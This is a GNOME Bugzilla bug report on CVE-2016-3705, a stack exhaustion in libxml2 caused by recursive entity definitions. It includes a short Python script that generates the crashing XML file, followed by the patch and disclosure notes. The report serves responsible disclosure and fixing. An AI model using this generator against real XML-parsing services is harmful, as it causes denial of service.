GNOME Bugzilla – Bug 765207
Stack exhaustion parsing xml in parser
Last modified: 2016-05-22 01:29:40 UTC
It is possible to trigger a stack overflow using a carefully crafted invalid xml file, the stack overflow occurs before libxml2 determines the xml file is invalid. This was branched from https://bugzilla.gnome.org/show_bug.cgi?id=762100 Reproducer and Fixes are available when this bug is private.
Generator for the repeater is below: #!/bin/python3 f = open('repo.xml', 'w') f.write( "<!DOCTYPE a [ ") i = 1 while (i < 30000): f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">") i = i+1 f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">") f.close()
Created attachment 327227 [details] Reproducer
Created attachment 327229 [details] [review] Patch fix
This bug will shortly be disclosed on the oss-security mailing list, you can make it public now.
FTR, this issue has been assigned CVE-2016-3705.
Fix commited at: https://git.gnome.org/browse/libxml2/commit/?id=8f30bdff69edac9075f4663ce3b56b0c52d48ce6 thanks, Daniel